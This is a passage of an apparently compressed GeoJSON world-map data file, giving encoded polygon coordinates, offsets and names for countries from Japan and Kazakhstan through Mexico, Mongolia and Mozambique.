Ǆ͔čγ\"],[\"@@ŝȂ®ãý\"],[\"@@Ĺ\\\\¤ɺƄhǛįġ\"],[\"@@ȔōǛwƮ\"],[\"@@áĤĦƲÔŝėŷ\"],[\"@@ķǘƺßř\"],[\"@@ķQĲàğ\"],[\"@@Ѯ@ƅˡ̠g£ŗżȡ˻Ε˕ࢻɡxƱ΋ȭø׈ķXĉŽ͓͙Ĩ­İŮxŴőƘN˒ϐѼţ¦Ʀʹ̄ģÓ¤ɇŶD\\\\ŵʉÎʉǙ¸żŭˮˀǫΉ͔|ĜȠkeĬҐǔĴǚȚĀȦ³Ȇɥ\"],[\"@@Ʈȣ¶Ô\"],[\"@@ÿlzƨļµƉ\"],[\"@@ɼ{ĐͿ̣ǳǏ̡ȉǜ˛À̅ŵʷѣơ÷ƋTÊŠǷ\\\\çќ͉÷Ԣ̌ʖ;ɐƋ͜ìlȐ̄ĖΆû\"],[\"@@č»ÍĄƜ\"],[\"@@ĝïƁü˲ɀÑɋ\"],[\"@@ıbƸˈÅ˩\"],[\"@@ōqĪö Úŗ\"],[\"@@ĳPrȾɈȦ¥ȫĸSȗȳ\"],[\"@@Ȑsֳ̰γưܥÛˋ̇̕á̟̝ÅūǃࢅΫݑʦыΓǷđˡѕɡc͎ɪʐəÔƹȽtɓǛŲȋiƍρȽȁ̘Đ¦ƹČѽѹթÌЙçǴǆʽ¾ûďtʬý^ɫ̹̈ȳuġѱū΍ԫȃÙȱÈ˙Ϣwʀˆˢ֧Ůб§ɹƿۛȋС±˿àƕУͽǶۓÛ{ʊĬŌ̌j೎ईࢶGৌȬŸȅ̔mȈĔǊƊẘՊՀŪՠЖŞΡͻİɽȖëɤǖڲɢӆՂДɊςڂɚزÏȘɅÆɨ˸ó˴̜ȼÂ̜ʄOĸ̫ǀĢƶ·ł˖ύÇDĪŔɄʖŏ\"],[\"@@¥ĴńÝŻ\"],[\"@@ų¤ĀĐŅ\"],[\"@@Á¿ǒĐŏ\"],[\"@@ݠǁռͲȕ֑ǚ̡аìމ͕ߝĳґϳǉΗ୕ӠύΝǣɵǴȓHŻɟۘЧŵÉ˷àɱʟʥí÷ŤĦ˰ɭ̬rʮӔ̼̊ظĻȤČ͘ৠƫ֢ìȶɪĞߒ۵߆ҭ\"]],\"encodeOffsets\":[[[126862,24863]],[[127277,25105]],[[128455,25337]],[[131337,27293]],[[132095,28387]],[[132560,28886]],[[133758,30990]],[[134103,31127]],[[133511,33202]],[[133205,33004]],[[131754,33571]],[[132175,33629]],[[132600,34021]],[[132911,34559]],[[134323,34410]],[[135441,34760]],[[132383,34943]],[[137583,35079]],[[137577,35312]],[[138172,35112]],[[132491,35179]],[[136572,37073]],[[141665,38730]],[[144619,42366]],[[142829,43091]],[[144687,46203]],[[144459,46421]],[[147277,45176]]]},\"properties\":{\"name\":\"Japan\",\"childNum\":28}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ķȤøÍŖøĤ£ǲ»ǢŸłEŶRÚ^́ǋɉŋĵ½\"],\"encodeOffsets\":[[78898,35953]]},\"properties\":{\"name\":\"Siachen Glacier\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ǁèĪŨÑŏŪÿ\"],[\"@@ѝɑѩڥťȉЁŌ։ƟǅחȝĳŢճCࠣǺ׷೹ʠƝ÷ʣɋĀˑ·Ʌǂ൏˽ƿĻԢƙŃԯβ޻ͩıŰƛ˯śNқśĨűĢγ½vȍƴĀbᅛǔ˹řUӝTûR§GěđՓØ۳˰˕ĝˣŉęʥyğÒƹåVă¢Ϋ´ďÞǭɣâџÄȷ¯û`Ɠ£̧ͥ®ûທەӍңWɇɿȳźÆȂƩƘਏcǯۆЩVúࠢʟħʳζӹͼϳƍਡÞ৻ŗࠛݸᏟঊᓡһBᶡҗsӣ֚؝̶ࣃƿҿ̯ĒࠖוĠʁʐˏ`LʶЃװнŐáŖƂƌ॒ý҅͠΀ξຈuΩȮ̤ԴÅ֐ӱŔ́Ƌ߭ʀકѝҏÛīƳׅɦbŶͶdڕ޸ֻĄǃÁȑаͻưͤˢ̂ȕǼòˤҒ֊ɶjՊѩΤÐőֺזȪƦȚؼǦҠτ̶çƲƟ݀Ƞ̐ȑ٤@ڪχΒщòЎ࢚έڲξѨβƧͮǞѨwѲ̳ӎ×ÐŅʐöȸɦ̮ƝѤbϔƒƔ϶ࣹ˜ιʂ߸ͺȃ˶ɰʠ࢈ΡȈϯº~ƄʲÞұĊɄͮזÓᒂπՄ͜ʄᖮ̔¨Ƹ٪Ȕ৤ȏҲŤϖץý͗ފMƴĶɖ͑ƨǊԜƩМîͿ˭ĎɓϞƠвōČƆ٦ȺǼǐ୴̒ƵʟȝNÂŇୀهᅂᐳπƞrȦʌĢͤđ±ȇˈWàǻࡸWɤƒԄĐӴȁ͆҉֖ƫȲϏߖĭдɸ£ǵגБ\"]],\"encodeOffsets\":[[[51389,45932]],[[89419,50264]]]},\"properties\":{\"name\":\"Kazakhstan\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Κi²ƿk§mŽNţɒ˷ݒ³ȾƁڒяŢćŜ}Ȑ[ƀIݘťƎĸŐƪªĆޢΠɌǹǚħŶDĠdɌ`ŬAɩ͙ɭ͛̓͗^ᶻɪ̋ƬȕĂĻVĹɟȿ̓áPȷɇɧΟůęҿɉ˛̵ݵɥǷഩ৐Ϟḭ႘নǾδɀɚÒƦˈǞƬЌBŤYǚå̘nÀϩָǎO°ǌGŁďäj´­hſ˦ǜǘǠǜɔɊȨȠǦǞƸƲ¶Ņ\"],\"encodeOffsets\":[[36174,5494]]},\"properties\":{\"name\":\"Kenya\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@·ƭé¬¿¨ɛ×Ūȓ²\\\\Ú[zl֝ǫʡǊৡ¿«ʪúz¨¸kÈTIÒE~мƴՐȓ͢ɾ˂͜œςʌɐWZŴǞ©ѺʬЉʛƤÍGåsuXKþa°£\\\\ÁmÿnãPiĮÅĒ^³tôwO}Hŕ»¹AáWǥ_Yʁ|ȿÔŃƨҫƞ֨ϬƦ ǒîHpgjçā³ec­ų̈ͦƔ¤ü_ȸ°Ͷ½ĪEɤãǬĒÝά³Ą¡æUÑƺzĠĚʦˤŊ˖Ğ۴˯Ք×ĜĒ¨HüQӞSŘV˼ᅜǓÜġþ»Ôµ¼ÁвÏŲġŜħŉWaeUʳcÍg×ą࡯˵Ǘččãa÷ȇǥƕsšJăřԁ á_ëīƏ¡icãíćŅë¹Ý»â͗ŅǍFĹˎDɽŭŉuęGśÃÅ|ċΙǇƙƁcÿ«Ã¯ďy£iyH£ěOy¥ěuë[ƉXéc§}ďŁYϿr\",\"@@ćXÍ`]@LgÐÓ¬Gø|\",\"@@nƀů³ÎeFÁìăAaå¬SüC¨R\"],\"encodeOffsets\":[[74384,40332],[72361,40812],[72916,40850]]},\"properties\":{\"name\":\"Kyrgyzstan\",\"childNum\":3}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ұȲʃđĮƴȆǃɎƭȍǛOwҠƩ˂]ÉǓ͐f˲ɋȴƍݞǮt̨ҪʒǐೢĄʜǛ¬®²\\\\TFwl¹·ĖùƴǪÏüĝÖ«ƌE¶ņyàûŖsä|\\\\Ƃ`t`ôSòWü¼°Â|{uÈÔ««iĀ^rC°ÂS BƸƨôPĖŢƿӟɰׁŉ΁֓ħĕƱљ˙ʉ}]ɗͣÒŽĻJ˹ʰɍFȱʻÎćł̋ùęɧÈBǭǑƕΣĻ\"],\"encodeOffsets\":[[106933,10662]]},\"properties\":{\"name\":\"Cambodia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ƔĭͷƌŤ¯ÒĊÝâĶ³iĥ\"],[\"@@ÄŃőÞÎ¦\"]],\"encodeOffsets\":[[[-161118,1901]],[[-163163,4018]]]},\"properties\":{\"name\":\"Kiribati\",\"childNum\":2}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ƉöƠŰӂ°yƣҝı\"],[\"@@ģÖȆĎġƣ\"],[\"@@ƑŘÒ ĀƷ\"],[\"@@UćƳvŞȞË\"],[\"@@ÿ½ƁňƮŤÔǭ\"],[\"@@IōýfWǘĠï\"],[\"@@࢚ೃ]ࡍƚCŹҫ˽̿ӅkÉȗ΁Ŷ˓ÉBȝʽĐÚǓŻƋŵêÖǬ̋ˇţÖȇǕɣ̠ɖrÌńơAŇˤ˔ΖĿÜɞȌǳʜ«ѸʳCiä˜Ȣʢ·òĽĘĪȗɊĥӴϦфߖr˰ˆ\"]],\"encodeOffsets\":[[[129359,34021]],[[129264,35196]],[[129201,35565]],[[131140,35642]],[[131831,35634]],[[129558,38643]],[[131456,39551]]]},\"properties\":{\"name\":\"Korea\",\"childNum\":7}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@āYĉǀĔưƎǑÕƃ\"],[\"@@٫SȧϨݵĚƌƎÚôŘǆȰϴиĆĠiȎÿvŭŚəƣȹȉˢ͢ڿ\"]],\"encodeOffsets\":[[[49434,30336]],[[49606,29228]]]},\"properties\":{\"name\":\"Kuwait\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ϤЋâȓÞDxödRŒŁĉΑÁȄʻĚ©Ɇ»ƠéϺȾĀżýȠƣ§û­sÑrcĖUĺJ`ÁlgŲEñAÃħĩYÉ·çŽŕOʉØǓMEe{çXå¿ă¯sI੊ջAµĵxù̀Ɂ¼ÝÎÿĒȷˆ˓ɚǕÄÕþšÜ£pÝP±ZƛĢƃêªfUıϸʹGû}ƟéoĪƷ¸·Ȏƙ¶å¯gÅÑ½ÙÝrÃjU­Jĥ­§ďOóƷƧAT­ÁqDÿ]j¬Ó¬Çv{|ɵđós_Ɓ_{[tãþŕxßµŅƋFÕ¬ûĞǩÐƳĕú¸mºCx¼lĊ¤ä°®¸l¼tɆpöYĠð@ňŀȚpĈDÒeȉŊNƄÙ¦Ƴ²ďÊȓʲËƴMȤ`Ǌ´ȊÛƊʽȦėİŃƢŭȒĉĒ§oęlƍÆšķJß]EauÁg§µëğȳé÷­JygK`eĀÿhę¾ǡƂNÇñóÓ³fóŧĻËQQšÿȷȁ¿eǑĔȢҺMŦñĶEȪ҈õ̎pƆQ¾חJīǠĺΠǝǪċßÿsXPºN²°ǼÆŠÜÆèzƂB¶IhËJw^ÐƔɒ͆Ǽ¸Č¶kĩÅQÃZ­pu[ƌ ĊFƌëpN²¢bPÝĒrʔGƠM¤ǱΪnªªªŔrRlIæđƸ¨Èu\"],\"encodeOffsets\":[[104579,22917]]},\"properties\":{\"name\":\"Lao PDR\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ϧ̙ʫPҐ঒ˠ͌΄z¯ƃƦÉäǯʳʝòï͇ñ¤ƕƓŹ\"],\"encodeOffsets\":[[36730,34235]]},\"properties\":{\"name\":\"Lebanon\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@àūìЭɛίʨƟʲĀ§òǑÒĳĀWƴÇ°ʓƻՑV˿|ȅ׵Ȫܻ϶१ࡰ࡝ԢǹȀȪ˜͞ʲȘȄÞʾ®°ƂÀÜʠ¨Hðê÷ʂĜɜǇŰգÿʍ̄ǗȒȘΨƢŉ\"],\"encodeOffsets\":[[-8690,7740]]},\"properties\":{\"name\":\"Liberia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ʡˏĞտɏБɶࡥ@᳿@᳽Aေ࠽M@нủཤ↏Ⴒࡉϕٛ̓؟Ҽౙ˴ϯڞۑȦʑÅşĘɉخҫؠɢ͢ʠŕךƘϤġୢе߀ǬĪ͂ƄņżƀǠďֲƈȆǜ¨ŐǌǾŶƮüƎìǄöŮÌ~ºCªãİ@ŞLĬPÌǼŸÁƀsϼȟЊµѾĨཤѯѼ߷ᅀн۶їϢűӸȈͰЌƻܖǐʹо̦ࡠ̚Ҩeݺʥ`ʋƲı۾ǡؾsɮˡ\"],\"encodeOffsets\":[[25755,32415]]},\"properties\":{\"name\":\"Libya\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@³ĕķŰƒȒZɫ\"],\"encodeOffsets\":[[-62356,14154]]},\"properties\":{\"name\":\"Saint Lucia\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@|ÙſŊń¯\"],[\"@@ɪaϬίѠܣŪ×¦ʃϞܟY͙ȋЍލϑϧ~ƟŦȣ֪ũ଒ĦɵŪ݌ƜʾY̰˼ą͏ƚÁƎ\"]],\"encodeOffsets\":[[[81792,9268]],[[81902,10049]]]},\"properties\":{\"name\":\"Sri Lanka\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ɉkɛ̓Ñęʭ͝˒ƛ˴ŗˆȦĚψӢȊÈŀĀŰàȪðĤlZ֨ёîȕĹ±Ŀŵőǿϛǧ\"],\"encodeOffsets\":[[29335,-30849]]},\"properties\":{\"name\":\"Lesotho\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@µPǸˤƁ˳\"],[\"@@Ù~m¦xʁßÉ¹ÅkƩXuĵkoϙçåx~Ս×jǠë¶ñĥédJwfépÏLµïŖHÐŠʸɏǀгJ۱ǚDǆƧ̞OǮO ɦĲ˶ńβüڔUþ_Ú³ÜNÜަđڂŒƖǓԀăްοCqÛ¡ĉ¥ÛW{qƼWâY`iƥţʹR]ÙķçŇ_ėwŗǛTŅMuyÃÙ«éiTiŪeÀĥǉ\"]],\"encodeOffsets\":[[[21461,56606]],[[26187,55440]]]},\"properties\":{\"name\":\"Lithuania\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ţ̃ƍ½[}¿Q©R}nyZÝ`YĐɼ|¨¦ÐĠîĨYjNEMïz»È·ÊyǸõ\"],\"encodeOffsets\":[[6643,50994]]},\"properties\":{\"name\":\"Luxembourg\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ӑ́ѱϫƍޯπӿĄƕǔځőʵÆԯÛÝMƕÔړV̓åÝU˵Ńɥırوքغۚź؞Փ̢ıؠɼ¹ԶIĄոžƌ­͘õ՜ˍȠÏθàȄÏŞYŤCÎÿɐħoTO«Ǉ̋Ɩl[ĥĬşĄ¯P¸ĻnÑT±­į\"],\"encodeOffsets\":[[28824,57491]]},\"properties\":{\"name\":\"Latvia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@řŰƒ࢖Ɨ˲ϩ̦Տۄ̥ĘlǨþ®_˞@˒Ěڔ˫êFמƵTЋːǓĮ˟ŮåƄ¯ÆĕOċUïǨī±ǓcS͇ĔŹZå÷gFGł]fFƿËF¿\\\\ÕÀĥ£qÝĉÑġSí½·ėµÏÏNŭǁg]«\"],\"encodeOffsets\":[[28890,46542]]},\"properties\":{\"name\":\"Moldova\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ĥƷǘ͠ñǧ\"],[\"@@ŉkkŀĲÀƓ\"],[\"@@Ͱ՝ʢඇȼչɱәǁƄŃ̂ȓÃƦ߷Ó˟ˉΧzփīο஭₵́గ͋ލϗ̥Ӎãճ˩ʫOছӚ̫אª٪ϧ६tϜǰӜʤƪԖ੎дǭ̔KˬǋϞ»ݬϊׄ°Тζ˄ȊĴïɌĐƮϪÜȰƽËǰŦǚϼʚƂǷMʆɔ͒Ħ¬\\\\ʝʞ̺ǆǇʬȈΆĥź¶ŨĊÈǺĻҔϞļάŏ̲Ūɲ̠˨̑\"]],\"encodeOffsets\":[[[51135,-17308]],[[49503,-13684]],[[50728,-12730]]]},\"properties\":{\"name\":\"Madagascar\",\"childNum\":3}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ōAɼìŭé\"],[\"@@ƾǸöƩɳ\"],[\"@@ĕ¥ŘŘñ\"],[\"@@zĥƉǆŐß\"],[\"@@ȩȴŘиύŚʝ\"],[\"@@ĿƻǤêg\"],[\"@@ƵĴɞÂʣ\"],[\"@@Ûȣȡàú̚Ŝèȡ\"],[\"@@˹Ɋùɠ͖ɩȿ\"],[\"@@ѫ೑ƥཉâͻϖҕÿʓtʚ̵Ϯӊહؘ܇Ɣѵјҍţ^ʚŇÿÞҎÉ͒ƽ˶̇ނɜ֘όǨϼ¼ƿ͊ÓɒƘËɶÿUזϲ͆ǜǼŜࣀ҄ɠଔʜϬَƁÀČƱxˬfǰƝªɩŻ̩еұi̳ȷȋéȄ|ȟșFÿż|ɕۻĵƟƣɂr˄ɛ̯ȑuʃЗ˝LyſໝBGӁǟDǵBθ͙ɠƅ¨ÝtÇ@¯¸Ėy®£@÷SĉZ÷ÙCƳ@ɵ@ϡ@ʫAȃ̭ĿǩĕƥĦȹqs]ÛΗඳ౐ϩȚ©·ΦǧևƶØĪǟyËŎƋšȆË˭࣡Пԁ̓ƸӍ¶ٟ˴ȯȖޭƺঁКْ࣏ٿĔدɚЃцࡵИҗ֖ƿΆΆǌÇƦƹ²ɲʼz̸ȇņǽ̴H˶ūʨ॥ੈۣӺȨĥ^ňρłˣϼȖ]թˈùżȭ³ŤɆʻšǁŔʲȎɮê«ƅʀǧƪɫOǃ̈́ηźǷʾÀˎӻĔ࢑ࢪݫൎXѺӝƖŕǲǁÒǛĹڅͦŦɇýЫ˨॓ڜջɌχʚŅĦʉȈóŘԉͼʩϼ܃ƎćăʤȎƟɺޗԖޟxѵʖȭÂȪʀƑ̆љɌƳÙˏѕɟ̙װ૏ߜĳ[ɩʢF؜ʵբե̴œ̦ĭŽ˛ÍȱȶԓɄāǴϡʰĚϼ·ɨöCąȜčõȴě^Ǿаݛިإͼ͙ࢢȟƔȜˡ̦¹ƜĐĮȑŬɽҊ፺ƴġǧẘষᛠJFϚ๠WʢˉচگЌ߿ͦʓߊ͙ɶǾɸҊ̄ĴۢāּԁϪܕڔٻ¤Э̊ԡผәȖø\"]],\"encodeOffsets\":[[[-93884,19126]],[[-89026,20791]],[[-109058,22130]],[[-113220,25604]],[[-114746,25135]],[[-113766,26646]],[[-117934,28744]],[[-114895,29702]],[[-115871,29750]],[[-99477,26585]]]},\"properties\":{\"name\":\"Mexico\",\"childNum\":10}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@аˏƖɇó͹ōI·ŹķġkʹǅwǵƱŷ¯©wԣeɉàȃ̂ÞԎƆ@¬ǔʂĎȐÑĒĶƠxB@Ɇ²ѼV\"],\"encodeOffsets\":[[22881,43330]]},\"properties\":{\"name\":\"Macedonia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Nᅫħ՛ɹտ˕ǿ_ŃύÒ·ïෛÍ̑ʑؗÏϟŮѱWʏȑޣ̧ŝʍЉºʋɷÝʫʡV­ͅȍćΛȀǟăƫƿĐ˙ɇķª˭ɩɗӵȻϝȫ˩ԭ\\\\řMų©W¡ŃĥéNķºEd¤úD~¹ˌțƁçtõÐmoS±KÅnĵoɏMÇǗ̱ǔɵòˡɝaƆɓƐÏъˡfɤ̜ΡʴHȾȍЖ̏Àǫͫȍѩƶιˁȉʴ̹ǅǓƸĨǦAҌȵάǑ­ȇˊĀȰ·˦ǫɄ«̎ƨÁpjºɘԶìòƤŀ WюЋɄɬي£жîAĮl¢Ú°`ŵoẀKŸڊűƆĳńyȬyȾyȾyȼíظǙฮ̵᨜íظ³к{ȾuȒʴ@ˠ@ˌBی@ᝀ༷᣾ၭjʅϐəØƩௐѹŀσŕʵȤĭܺƀ\"],\"encodeOffsets\":[[4330,19603]]},\"properties\":{\"name\":\"Mali\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ŉíƀǸĿ\"],\"encodeOffsets\":[[14916,36714]]},\"properties\":{\"name\":\"Malta\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@Ã±ƤƤğı\"],[\"@@¾ǳǅŬňÈ\"],[\"@@sǥÿz·ȌƬ\"],[\"@@¥ưŦŅÿ©\"],[\"@@ÁģÁÊń\"],[\"@@ĽũřC˼Đã\"],[\"@@KƏɤ¦ē\"],[\"@@ÑHĀĢmĩ\"],[\"@@ÅćoŪǴǲĽɓ\"],[\"@@ā¬¾ǘɃ\"],[\"@@ǟƸɎC­Ƴ\"],[\"@@ȚŉąũKĥƚÐÂ\"],[\"@@lřčǒâ·\"],[\"@@ZăĝɐĄƋ\"],[\"@@·ċͅǻõǉi}]ÏxÌIJgµƁAçyÛÅÅş¯ǻM±ĳÀ£ÃRƛĉɗxǳΉ§ƃ˛қë̙¼ǕʏÑܹ̹ÏɒȑØб؜ۑȆթƦò¬ÅÏƝȍŋֵ̭ƏVȑ̲ԭӊե[ֻʀЛǮ٣Υ֧εύ¯ЃŝŽćբǮʼÈԖŔňȫf¼ФąjàĒđۂ̿ی§˧ÆUϖǅЮĠ@ǧǦďࡢŁŨŢҤ̍ƧӔ̉ʲ¶̵ťˏ˫ǣȯɚŖ˕ҽɳ̽ϑó˺ƛɫȟO¥̬șɹԜɗΗǽß̬ಬΙ঎ÚRƧŸqͨĭ͙ȉńǳ˾˨ŋƤǞ͗ˮĄŘϩƂĵǱŅǼÆʬȧǙÀƎŽȈYɣͱиŧфŶŬʨőƊUЈOĪźB¦wǌďĚǦúŴé̞ŀˌŪ¤b ޴łÛȘf͢œȀϚìŸĮƎǮϰųİĪȲ˘ʾpŤàØ°E|kjČQʄŢƖࠪԶԚƀƍŰcD¢ǝɶeÚâƸò¾ʚȆĖjŎÚČĚƀ¾Nϴ˥ȤՕżĚǖëôڋ­ԅķĭüǫ˓ɷǅ_ŏɹǅç͍Żā©ʃƪəťˋծǚԼVƃǻžɽηҰĹöğ˃۫،ćpɧǨɷϨQЌʄºƿ\"]],\"encodeOffsets\":[[[100539,10172]],[[100567,11216]],[[100920,12027]],[[100881,12191]],[[100420,12688]],[[100776,12901]],[[100675,13414]],[[97081,16199]],[[96745,16329]],[[99917,16644]],[[95940,19133]],[[95964,20028]],[[95736,20370]],[[95243,20403]],[[103567,22086]]]},\"properties\":{\"name\":\"Myanmar\",\"childNum\":15}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ϡʉ֢˯ʑÉTǳɳÑőŸ̽ϥ¾ʭݿ׈ĠæáŖmǈb|z^Ŕ`CĆ¬ĚÚ¬ĐÀìM­¢NTÄąŞV~p`®Sª]TªP|Crë\"],\"encodeOffsets\":[[19680,44493]]},\"properties\":{\"name\":\"Montenegro\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ܷ˵ԛӉߧˋēcշkџ୵ƅݷʛҭȇįå×Å¡ËiНÂ@Ȁǋʵ£ʉ՛ɊлðΗÆƷ¸ˁʆåpé^͹ZӕÆε®đNџğ቙ȆۏÍѳҲ˫֬ǙðrȨՙÖ৑ԀؓúǫqŽCɁvţϏP҅Šơkǹˢ˸іIÎ£ÔĀØВÙŔÒÏ~ëfǿʀÑȂßþa¶clĹtóÙŎÍR¡ái­FǻƬçrγuÛ¢­áZſÌę¦QĈ¥ÈēhēÌˣêäŸȓìõøŊĴ³äRUĸD¬nòÞǐφǖâXroUĐzÐ~nÂŸ_â¤ĖØdSƼΆǆԐňº ɘĠǲÈVNØC®̜ƠʦCôRƎƎÒ»ǚī°I¶xÌÞVîWƌƣ॰¡Ĕ˫ɔǕ¼H`ǲ@ƴĝΊoҘòȾć֞eȈŵŶVȖƜΐĒȺʎ|ȚœÇ£ǡ˸ɸоҌˊɆˈࡺ̥ĨeǐMȪGÊY܂ɕǄ^ɀʔËH«cTĝµjȃĐģyŏࡠ͓ˢ¿ø`ânɶmરːۮƛŴ\\\\ǦVŘ_ȖĭČġĒ­øĪEʆGʈ¤ʙψɏĬ¯üeԼXǼÚu֞ċȔ¦ʀÝĲp̈́ŚŎªþ[մèΒĞǠsĞbĞŠ¢ÜÔĖżÞńÊņÆ؊ɢϐɖăɬǃøÄ_ƆSňKàtŌǪºèCŔǚµŎąܥ਷{ĹJğUćū¿ĩ±üɋʀƿĄræàƀÌðD¾_ŔIŜtĞJŠa¨aĲ}ǺŝÆ]Ζ˰ؘGÎļķÎÃĶŘÄՊчƾʕƻĳkïCūnţYƛrǡĆħt­[É¯×TËSƧXă\\\\ŷïWˣůǍÐĝC_[čBo{Ћvʝĉ̋ͷ`X¥³ѡɿѥËȱWƱƭ{şƿɃŷñáǟÙȋŏÅcҍÄ˽ÖğćĀó ʣJãfœcзבѾҫ­œ\"],\"encodeOffsets\":[[114564,44729]]},\"properties\":{\"name\":\"Mongolia\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@èĞ¦Ïō\"],\"encodeOffsets\":[[149250,15497]]},\"properties\":{\"name\":\"N. Mariana Is.\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@MˎÃȨfɜĥ¼఺ƽӌɇΈɏࣤŢĒࡂࡄÛƊŜАр֦ǷԄÔʈųƎʘӦĭఐÒƞࡏʄס;ڡz̒Əո᠂ࠒκүبŤŌơחʛҁʂЩ;χƮśƯº£ÞGÒZdlSʐ§ƚ©ÆU\\\\ÚƺĮǸȬĠ| ČĐࣈuzgǊƁǦǛɞħŢŅƌȝɈͷǤÇȆEĜƹߎȼЌ®ĐƖZŐEȈHȤQðkºFÊhżŊłCƞéþÑ`½Ī֤ŞͦťƚƸĂǐʊӒĳиȸۢɊƠüЌ̚ŰǓĿēĢÅǍуň֟ЧĀţť̇ŎCvख़ĶûÍ˗ňİÎʟȏͭũ֕ߵǋÍ®šٓҋ߃ɧݳйʱɇ҇ٵş¨wţ͍ōݿۍʣĤĚĵ§յɸ˩ʊ܁¢طÊµÖ˶Öŏ׷ǣۭƞu©ȭлӭၽ۷̷ћɒɛĘƺkƙӟEe҃YŹzñK\"],\"encodeOffsets\":[[32884,-27483]]},\"properties\":{\"name\":\"Mozambique\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ÃćĐŒƀ}Ƈ\"],[\"@@ŷډṿL³ƦSk£Bĭгíً¤ɃɫэЌʯǙËƱȽűǅ¹oiʭŦ˛Ȱ̵φʯЦ̅ĨĥqγζׅĆٷǉЃ ǝ˝ěmƯá@ϖÔ˄ζઌƵबʧ̞ǬŴŝȠيȁΦǉeɇϞĹ¥ȝ_þČβพD६BϪBȖ@Ȗ@Ŷ@QŐOĘQŢSŢՠ·˚ĸưŖöƀĔĴà¾hƾx̌ŲNц@΄@Ҝ@Ŗ@ɮ@΄@Ɍ൞@޴@̼@ƾ@Ǡ@@Ī@Ǝ@ȌAȎ@ǖ@̪ἢኑۋ@ˋA˟@ʳ@ǔก̶ᨛǚอîطzȻzȽ´ЩĴŃŲƅ\"]],\"encodeOffsets\":[[[-16766,20180]],[[-5488,16674]]]},\"properties\":{\"name\":\"Mauritania\",\"childNum\":2}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@Ó~ĖÁ\"],\"encodeOffsets\":[[-63640,17143]]},\"properties\":{\"name\":\"Montserrat\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@˩¶ĈȲȮǎŔȇşɭ\"],\"encodeOffsets\":[[59035,-20976]]},\"properties\":{\"name\":\"Mauritius\",\"childNum\":1}},{\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ŏFƕYYÍȻЋƺߍFěÈȅ͸ǣȞɇņƋĨšǜɝƂǥȃďࣇċğ{ȫĭǷÙƹV[ªÅ¨ƙTʏckÑYÝH¹¤ ưƭŜͽψʁЪʜ҂טŋƢاţЧՄƕËƷːŃĊʠ̬PѰҌ̔ƟóǐªΠÑɰ\\\\Ĥȸñʲ̴ʤĝƌ_QĮǻǔtì\\\\üďĒďžŷeÙǸࠀəĚƦ˚ȣȾёĈҩ¹ʍƔɕĮ« Ínī\"],\"encodeOffsets\":[[35799,-11856]]},\"properties\":{\"name\":\"Malawi\",\"childNum\":1}},{\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@ßnnˤ²̑\"],[\"@@û²Ėŝ\"],[\"@@ȡa¸þƪÛ\"],[\"@@ćW°ƺþµ¥ī\"],[\"@@ÐęƥăćžǞ \"],[\"@@ȪÏǎʹӀϡˌҷpྕ̼̑΀ܛ˭ŕrŏǰTƙʟIǷĵĻǼՉʺளࡼJ̲ӭ״ä´Ʊ̎ɫഢȋϪŤȮìŏΆ÷ĴǷưEÑЅŎőϊɪĺŇǐ ȒΖ\"],[\"@@ЉƖӯջmƳŽȋঃǩQŇŋɕĊģͣɭɩˋѹԟcɽǕԭǖÁŐϻOʑĵěʝɧōשԃǁ܏نīʀúŎȢɛРܾ˕ǍƌȪӨ¹ȪȢDÌ̤ఎΚ޾ࣨŞ̊Ӹүƾ̘ÿ˚ɾƴäѓƸųҠȠưƈœːƺǄŘÏŘæܺନĎų¿ȃ˺̨Đ{ÄəˆƑìƋ¥̉ţįфƚĦǅƱÙå͊ČȰǵՆƯĕůʳŗշ